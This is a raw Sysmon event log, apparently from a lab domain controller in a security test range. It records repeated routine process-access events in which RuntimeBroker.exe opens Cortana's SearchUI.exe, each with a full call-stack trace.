12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
